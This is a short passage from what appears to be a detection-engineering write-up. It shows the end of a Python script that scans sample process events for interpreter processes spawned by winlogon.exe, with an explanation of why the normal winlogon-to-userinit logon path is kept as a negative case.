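              r"CORP\alice", "Medium", "Medium", "cmd.exe"),
]

if __name__ == "__main__":
    for parent, image, hits in scan(SAMPLE_EVENTS):
        print(f"{basename(parent):14} -> {basename(image):16} {', '.join(hits)}")
```

The winlogon.exe to userinit.exe event is kept in the sample deliberately: it is the normal logon path and must not fire, which is why the rule is keyed on interpreter children rather than on "any child of winlogon".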
Potential Detection Coverage Based on MITRE ATT&CK Technique
Sources